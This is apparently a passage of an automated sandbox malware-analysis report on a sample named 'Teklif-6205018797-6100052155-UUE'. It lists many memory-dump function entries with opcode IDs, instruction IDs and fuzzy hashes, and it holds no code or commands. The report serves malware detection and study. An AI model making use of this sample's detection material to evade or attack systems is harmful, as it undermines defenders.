                                                          • Instruction ID: b5cf50928a84cf723f113757d00d7d7967008bcbe4e1b26e2f07800ef3e6b655
                                                          • Opcode Fuzzy Hash: 64866247624d5467484336ca29495da7445534de101c4a321ad74d5eaa4cfb15
                                                          • Instruction Fuzzy Hash: E4E09A74D09208EFCB15CF98C8009ACFBF9EB88300F14C0AADC1857341C6329A51EF80
                                                          Function 0596708A Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 094ad0c76cdd7a2dad06e8f0a37207df1d7b1dd7b191f8ee514b558ea165c0d1
                                                          • Instruction ID: ed9a73c2cf013757781141f076dfb944cc422bc73357c16c3b55b79fe2e92f7b
                                                          • Opcode Fuzzy Hash: 094ad0c76cdd7a2dad06e8f0a37207df1d7b1dd7b191f8ee514b558ea165c0d1
                                                          • Instruction Fuzzy Hash: 59E0863090D104DFC784DBE8C5513ACBFF6EB49215F2885AAC80D57391C6378A45DF51
                                                          Function 05C8F060 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5df01a81d4702b53f1d8723a5f96e96681eb16fdcf4e284c8652b5f61e296cca
                                                          • Instruction ID: dd3b80b1f09210a9bd84301c2ed1d291270b8739a9b509961a451d039bf24502
                                                          • Opcode Fuzzy Hash: 5df01a81d4702b53f1d8723a5f96e96681eb16fdcf4e284c8652b5f61e296cca
                                                          • Instruction Fuzzy Hash: 02E04F74909108AFC704DB94D8409BDBFB9AB46315F14D199984457351C6329A52EB91
                                                          Function 0585D568 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d77c624affb196723b5a29e26f267828065f90b35e784db9db959f564176782e
                                                          • Instruction ID: aa0c9d0f96707a71f90f43fb87aa062758298d70d60a7d00820d744102bc3faf
                                                          • Opcode Fuzzy Hash: d77c624affb196723b5a29e26f267828065f90b35e784db9db959f564176782e
                                                          • Instruction Fuzzy Hash: 7FE01A74909208EFCB44DF94D844A9CBBB5BF49325F50D198EC0557361C6319E50EB41
                                                          Function 0585D098 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe5224f868ad1dca54aaddfc21fd24f3d897c28fab1cdda9c0c09e802354d1c5
                                                          • Instruction ID: 4ed416af231fb86bddc9008f7ae42f8aad412360c9b8313c357cee28081fde2d
                                                          • Opcode Fuzzy Hash: fe5224f868ad1dca54aaddfc21fd24f3d897c28fab1cdda9c0c09e802354d1c5
                                                          • Instruction Fuzzy Hash: F8E01A70D09208EFCB54DFA8D4046ACBBF6EB44310F5091A9CC0893340D6355A41DF81
                                                          Function 05854C50 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b00bdb4c0d404525ca048d03993d34d15bee0f257d499b765c7ae629f16c5d0d
                                                          • Instruction ID: f3b63b9bf2a38c7bd905459d4583a01212858a045968646c5c849641967ecd80
                                                          • Opcode Fuzzy Hash: b00bdb4c0d404525ca048d03993d34d15bee0f257d499b765c7ae629f16c5d0d
                                                          • Instruction Fuzzy Hash: F2E0E574D08208AFCB04DF98D9409ACBBB5AB89314F14C1AA9C4493351C6329E91EF81
                                                          Function 05968890 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a46fe8539ac467cb1d2fe308418a219b90e60b0fceafce2640bfdd7c081f8a3a
                                                          • Instruction ID: 57c502b9d7efd3cf537e400db702d874b2910e165c94ae488589571b8c76a66a
                                                          • Opcode Fuzzy Hash: a46fe8539ac467cb1d2fe308418a219b90e60b0fceafce2640bfdd7c081f8a3a
                                                          • Instruction Fuzzy Hash: FFE0863080920CFFCB05DFA4D80099CBBB6BB45301F508169EC0422390C7364A54EB41
                                                          Function 05C87FF0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c066c2549bf7b5b4de2c006b9307d9a2defbfaa45a249defbc42f5964bbb84c8
                                                          • Instruction ID: 9b53a4f04177e921572aa395f6d1593110b14289c26acd429380f23ef9861f89
                                                          • Opcode Fuzzy Hash: c066c2549bf7b5b4de2c006b9307d9a2defbfaa45a249defbc42f5964bbb84c8
                                                          • Instruction Fuzzy Hash: 1AE01A74D08108EFC704DBA9D5405ACBBF5AB88304F14C5A9DC1853341C6329A42DF41
                                                          Function 0585DD43 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74c71f8fc0b1f8e2ee0aecf1eac09f63923f18de1b9cba950c8a4c7229ad0741
                                                          • Instruction ID: 269d61a4486964f55a22cd44e8954fc5c5bc12b5efd41c349f609368baa36bb9
                                                          • Opcode Fuzzy Hash: 74c71f8fc0b1f8e2ee0aecf1eac09f63923f18de1b9cba950c8a4c7229ad0741
                                                          • Instruction Fuzzy Hash: B4F01C74D01118CFDB94EF28D895B99BBF2EB49304F1045A9A80DA7385CB305E84CF14
                                                          Function 0585D84D Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab09dc8781a09bd8eee6f9d261301705d6c641dc15ec3fc32c99dcea4077c0bc
                                                          • Instruction ID: d87fcd7adfb478aa23cb34344052bdcc02969e52bdc6bbb127b18c859e39c5c1
                                                          • Opcode Fuzzy Hash: ab09dc8781a09bd8eee6f9d261301705d6c641dc15ec3fc32c99dcea4077c0bc
                                                          • Instruction Fuzzy Hash: 2DF0F270A001188FDB54EF58D9957DDBBB2EB89314F10489AAA4AB3341CB315E808F25
                                                          Function 05853FC0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec3af7a90685a5031900b22a5c8d2de62f0ed8bec9bd2b7c028617854c410196
                                                          • Instruction ID: b914f2720ea61e6c2d95ecd74b3efd08f977124347b3f2ea3a914a53ca242f44
                                                          • Opcode Fuzzy Hash: ec3af7a90685a5031900b22a5c8d2de62f0ed8bec9bd2b7c028617854c410196
                                                          • Instruction Fuzzy Hash: C5E01274A19208EFC744EFA8D948A98BBF4AB08215F1044E8EC08D3361EA31DE40DB52
                                                          Function 0585E3F0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a48dabf8a1c3b2bf74ed49e7bf6a63906a99092c6f22778713d9c72c24be8ee
                                                          • Instruction ID: 371b3305e5af81b0017e38da032f5999702a051042ec0d5a56ccf7dfddca725d
                                                          • Opcode Fuzzy Hash: 8a48dabf8a1c3b2bf74ed49e7bf6a63906a99092c6f22778713d9c72c24be8ee
                                                          • Instruction Fuzzy Hash: 0AE04670908208EFC784EFA8C8446ACBBF9AB48214F2080E9DC08D7341E6329F42DB41
                                                          Function 05852F70 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c532793a0cacd41a37907a66a49c4ff643d9586878ef88b6ec58021550afadb5
                                                          • Instruction ID: bbc3ac6ffb5f9f880186ee23435dbb7fe8c33c0107c67c7d7371fc47ae73cf9d
                                                          • Opcode Fuzzy Hash: c532793a0cacd41a37907a66a49c4ff643d9586878ef88b6ec58021550afadb5
                                                          • Instruction Fuzzy Hash: EDE04678909208EFC754EFA8D948AACBFF4AF08315F5081A8EC09D3361EA319E40DB41
                                                          Function 05963FB0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 75b0529967ee1a99fb5edfab2e60eaa6baf68e4d946d7d085286b05b23cdbf82
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 0FE0C234948108DBCB04DFA4D8405ADBBF9EF85300F10D598DC0813341C732AE46DB81
                                                          Function 0596E7D0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 9c0ab575bd9235b6a34fbb6ec9451212a935908b96f1fc0cee8ea5688118480e
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 4DE0C238908108DBC704DFA4D8405ADBBB9EB85300F54D198EC0813341C6329E46DF82
                                                          Function 05968FC0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 21f573a2665672c8bf73275011657796b6c18f75647f7e363a42e3473f9681b6
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: F6E0C234908108DBC704DF94D8405ADBBFAEB85300F10D198DC0823342C7329E46DF81
                                                          Function 059636B0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 454a44f29a9ddbf54aaa458d4954f00a285c1f5c1924f98b5f49d7f3eab2527f
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: B1E0C234908108DBC704DFA4D8415ACBBB9EF85300F10D598CC0813351C7339E46DF81
                                                          Function 059696D0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 1807322dd306aeb2cdb8d56ac78da94c44e0f82c9632a049be37ecd3e1a40512
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: F3E0C23490C208DBCB04DF94D8405ACBBB9EB85310F50D199CC0813341C6329E46DF81
                                                          Function 05961638 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 98bc65770ffe57ca200a69712899c3a9a5e00aa5b9b81ef05cb172fb96600e6c
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: EEE0C238908108DBCB04DFA4D9445ACBBB9EB85304F14D1ACCC0813341CB329E46EF81
                                                          Function 059651A8 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: a58c92627b6f77bc68cabf76b181bf1c4ffa02cea7cb2eded5a2fe856d046a5a
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 1DE0C234908208DBC704DF94DD805ACBBB9EB85300F51D1ACCC0813341DA339E46DF81
                                                          Function 05960880 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 0950011a932b445f3ee30277e87f73edeba689afafb904568f16f04f73eb02f4
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: E5E0C234D08208EBC704EF98D8845ACBBB9EB85300F10D198CC0813341C6339E46DBC1
                                                          Function 059628E0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: e17ccd52121515c332c54a5324a165f1a83300dbcbf6493d49a1cece33c92d24
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 92E01278909208DFCB04DF98DD415ACBBB9EB85315F14D199DC0917351C6329E56EB81
                                                          Function 059622A0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: fa289217830b8b9f82b184b3d2fd4b2c40d77daf80d5c49d6b7d721383a9c70e
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 4FE01278909108DBCB08DF94D9415ACBBB9EB85315F14D199DC0917351C7329E56EB81
                                                          Function 05964A38 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: d687f231933bdec28d930db87f8cea77af89b806506223258db14a4dad7f9921
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: ADE0C238908108EBCB08DFD4D9805ACBBB9EB85300F10E1ACCC0C13341CA329E46EF85
                                                          Function 0079A970 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a0d916c25c568cf2e6da93139937f25237e974ece2819d130d86b999b092b93
                                                          • Instruction ID: 5b75b1872647879d0f4764c8357537d6d04c4c7339b3f353cb287f68f1f0b2e2
                                                          • Opcode Fuzzy Hash: 1a0d916c25c568cf2e6da93139937f25237e974ece2819d130d86b999b092b93
                                                          • Instruction Fuzzy Hash: 80E0CD70441108DFC704DFF8D90464E7BF9EF45301F0045A5950493150EA755910DBA2
                                                          Function 0079DEA8 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7f0987398b8112a4f03b6bdba614ee703d77a3c2fc937a6936667fa2456775
                                                          • Instruction ID: 12aa1d87a6ba505c133a7e3ae517b2cfb61fc552cadc50b029874b1d960c0b05
                                                          • Opcode Fuzzy Hash: be7f0987398b8112a4f03b6bdba614ee703d77a3c2fc937a6936667fa2456775
                                                          • Instruction Fuzzy Hash: 23E0C270841108EFCB00EFB4D904A8E77F9AF04300F0045A6950493150EA3A5E00EB92
                                                          Function 05C8D128 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction ID: 3f09b9497b39c57fe00f57f67679817b1ee328a9207abae97f95fd01aaebfd3b
                                                          • Opcode Fuzzy Hash: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction Fuzzy Hash: BAE08C34908108DBC704EF94D8415ADBBBAAF85316F109198880A13381CA32AE82DB81
                                                          Function 05C8CF98 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction ID: c0af05a26245e0d104944ea859dc6b2cd715965f0af86517e2934b6eb56663bf
                                                          • Opcode Fuzzy Hash: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction Fuzzy Hash: 1DE08C38908108EBC704EF94D8405ACFBB9AB85305F209199980817341CB329E42DB91
                                                          Function 0585D110 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec936ce54183aacaa2db52a474675a2f804d97c620c2f7e59b60b7ba0083c98b
                                                          • Instruction ID: b9c3327760f48dc0986d88a28d8edd29fe0c86636bacaba84ea22113fbd5d4f2
                                                          • Opcode Fuzzy Hash: ec936ce54183aacaa2db52a474675a2f804d97c620c2f7e59b60b7ba0083c98b
                                                          • Instruction Fuzzy Hash: F5E0EC70D5A208DFCB44EFB9D94969CBBF5AB05211F1051A9DC09E3350E6325A90DB41
                                                          Function 0585DFCD Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a72b8efbc83deaaa037c7d5be4dfa59fd5e0a4a5674bcc7265116226d10ea05
                                                          • Instruction ID: 877a5556d1c07780c73151fe5b2549d5cf33d5ec6adf0dfcae30c36e15302a97
                                                          • Opcode Fuzzy Hash: 0a72b8efbc83deaaa037c7d5be4dfa59fd5e0a4a5674bcc7265116226d10ea05
                                                          • Instruction Fuzzy Hash: 67E0E570941208DFDB04EF98E895BADBBF2EB49318F244869E809EB355CB759E44CF05
                                                          Function 0585DA52 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b0d2dfe6638298ddf51791adb17aa33ed6686d76e33e24ea01b44865b0da9e6
                                                          • Instruction ID: 4a47c65a6e259457e5cb72eb9591193a47ac64d2f43ae46eb176214b8a376424
                                                          • Opcode Fuzzy Hash: 7b0d2dfe6638298ddf51791adb17aa33ed6686d76e33e24ea01b44865b0da9e6
                                                          • Instruction Fuzzy Hash: 7DE0C9789442288FC794EF24D8557DABBB6EB4A300F10849AD80DB7351CB301E89CF65
                                                          Function 0596BEA4 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d05032759ab180161d75b0049201941832cb68bc9c6e5c270f585cd51f2842a9
                                                          • Instruction ID: 29890aa76d7c5af2f908a6110dcefb1126d266fa0598c8583f44fc138059429d
